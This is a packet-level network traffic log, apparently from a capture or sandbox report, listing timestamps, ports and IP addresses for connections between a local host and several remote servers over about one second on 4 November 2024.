Nov 4, 2024 17:32:08.092760086 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.092829943 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.093899965 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.093944073 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.093961000 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.093987942 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.094006062 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.095264912 CET	49955	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:08.095305920 CET	443	49955	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:08.095439911 CET	49955	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:08.101569891 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.101610899 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.101638079 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.101675034 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.101701021 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.101706982 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.101716995 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.101752996 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.101752996 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.106017113 CET	49955	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:08.106039047 CET	443	49955	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:08.596026897 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.596060038 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.596112967 CET	443	49952	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:08.596153021 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.596198082 CET	443	49952	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:08.596256018 CET	49952	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:08.596376896 CET	443	49951	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:08.596402884 CET	443	49951	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:08.596445084 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.596452951 CET	49951	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:08.596462011 CET	443	49951	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:08.596520901 CET	49951	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:08.596543074 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.596590042 CET	49952	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:08.596606016 CET	49951	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:08.596611977 CET	443	49952	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:08.596618891 CET	49952	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:08.596625090 CET	443	49951	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:08.596626997 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.596632957 CET	443	49952	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:08.596657991 CET	49951	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:08.596666098 CET	443	49951	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:08.596671104 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.596693993 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.596724987 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.596738100 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.596751928 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.596764088 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.596771955 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.596771955 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.596776962 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.596782923 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.596797943 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.596812010 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.596813917 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.596828938 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.596831083 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.596883059 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.596883059 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.597049952 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.597079992 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.597099066 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.597112894 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.597124100 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.597124100 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.597129107 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.597138882 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.597146988 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.597162008 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.597173929 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.597182989 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.597182989 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.597285032 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.597449064 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.597529888 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.597572088 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.597588062 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.597618103 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.597644091 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.597853899 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.597870111 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.597882032 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.597894907 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.597904921 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.597909927 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.597919941 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.597924948 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.597935915 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.597950935 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.597955942 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.597966909 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.597995996 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.597995996 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.598020077 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.598251104 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.598268032 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.598289013 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.598301888 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.598315001 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.598324060 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.598324060 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.598334074 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.598350048 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.598352909 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.598365068 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.598388910 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.598393917 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.598393917 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.598404884 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.598426104 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.598432064 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.598453045 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.598465919 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.598465919 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.598468065 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.598504066 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.598504066 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.598534107 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.598603964 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.599699974 CET	49956	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:08.599741936 CET	443	49956	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:08.599795103 CET	49957	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:08.599807978 CET	49956	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:08.599841118 CET	443	49957	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:08.599915981 CET	49957	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:08.600016117 CET	49956	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:08.600029945 CET	443	49956	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:08.600099087 CET	49957	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:08.600121021 CET	443	49957	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:08.600539923 CET	443	49948	4.245.163.56	192.168.2.5
Nov 4, 2024 17:32:08.600569010 CET	443	49948	4.245.163.56	192.168.2.5
Nov 4, 2024 17:32:08.600606918 CET	443	49948	4.245.163.56	192.168.2.5
Nov 4, 2024 17:32:08.600630045 CET	49948	443	192.168.2.5	4.245.163.56
Nov 4, 2024 17:32:08.600644112 CET	443	49948	4.245.163.56	192.168.2.5
Nov 4, 2024 17:32:08.600668907 CET	49948	443	192.168.2.5	4.245.163.56
Nov 4, 2024 17:32:08.600693941 CET	49948	443	192.168.2.5	4.245.163.56
Nov 4, 2024 17:32:08.601914883 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.601931095 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.601947069 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.601984978 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.601996899 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.602032900 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.602091074 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.602365017 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.602420092 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.602432013 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.602447987 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.602478981 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.602494001 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.602526903 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.602541924 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.602555037 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.602610111 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.602610111 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.602819920 CET	443	49948	4.245.163.56	192.168.2.5
Nov 4, 2024 17:32:08.602880001 CET	443	49948	4.245.163.56	192.168.2.5
Nov 4, 2024 17:32:08.602891922 CET	49948	443	192.168.2.5	4.245.163.56
Nov 4, 2024 17:32:08.602900028 CET	443	49948	4.245.163.56	192.168.2.5
Nov 4, 2024 17:32:08.602925062 CET	443	49948	4.245.163.56	192.168.2.5
Nov 4, 2024 17:32:08.602938890 CET	49948	443	192.168.2.5	4.245.163.56
Nov 4, 2024 17:32:08.602965117 CET	49948	443	192.168.2.5	4.245.163.56
Nov 4, 2024 17:32:08.603154898 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.603183031 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.603197098 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.603216887 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.603245020 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.603308916 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.603339911 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.603352070 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.603357077 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.603391886 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.603391886 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.603924990 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.603955984 CET	49948	443	192.168.2.5	4.245.163.56
Nov 4, 2024 17:32:08.603959084 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.603964090 CET	443	49948	4.245.163.56	192.168.2.5
Nov 4, 2024 17:32:08.603974104 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.603986979 CET	49948	443	192.168.2.5	4.245.163.56
Nov 4, 2024 17:32:08.603987932 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.603991985 CET	443	49948	4.245.163.56	192.168.2.5
Nov 4, 2024 17:32:08.604012966 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.604023933 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.604027987 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.604039907 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.604054928 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.604085922 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.604085922 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.604928017 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.604952097 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.604965925 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.604980946 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.604991913 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.605015039 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.605029106 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.611861944 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.611895084 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.611912012 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.611931086 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.611943960 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.611967087 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.611968994 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.611984968 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.611999989 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.612026930 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.612026930 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.612381935 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.612433910 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.612438917 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.612457037 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.612512112 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.612684965 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.661736012 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.661762953 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.661782026 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.661839962 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.661911964 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.687736034 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.687774897 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.687792063 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.687835932 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.687887907 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.688010931 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.688026905 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.688043118 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.688085079 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.688085079 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.688133955 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.688153028 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.688174009 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.688204050 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.688204050 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.688205004 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.731090069 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.731147051 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.731163025 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.731167078 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.731180906 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.731199980 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.731215954 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.731245995 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.731271029 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.731287956 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.731302977 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.731321096 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.731355906 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.731378078 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.731429100 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.732040882 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.732063055 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.732120037 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.781408072 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.781434059 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.781451941 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.781469107 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.781487942 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.781527996 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.809674978 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.809715033 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.809729099 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.809740067 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.809775114 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.809808969 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.809819937 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.809833050 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.809854031 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.809869051 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.810082912 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.810138941 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.810601950 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.810689926 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.853317976 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.853331089 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.853343010 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.853393078 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.853435040 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.853442907 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.853451014 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.853463888 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.853483915 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.853497982 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.853637934 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.853682041 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.853687048 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.853703976 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.853729963 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.853730917 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.853750944 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.853789091 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.865669966 CET	443	49954	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:08.866251945 CET	49954	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:08.866290092 CET	443	49954	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:08.866795063 CET	443	49955	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:08.866823912 CET	49954	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:08.866832018 CET	443	49954	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:08.867284060 CET	49955	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:08.867300987 CET	443	49955	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:08.867665052 CET	49955	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:08.867672920 CET	443	49955	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:08.896657944 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.896744013 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.896749973 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.896789074 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.903523922 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.903549910 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.903568029 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.903584003 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.903769970 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.931029081 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.931051970 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.931096077 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.931126118 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.931139946 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.931150913 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.931173086 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.931186914 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.931307077 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.931328058 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.931349039 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.931384087 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.931581020 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.931648016 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.932048082 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.932133913 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.973608017 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.973625898 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.973638058 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.973673105 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.973711967 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.973715067 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.973725080 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.973737001 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.973766088 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.973783970 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.974087000 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.974107027 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.974117994 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.974128962 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.974140882 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.974143028 CET	49946	80	192.168.2.5	31.41.244.11
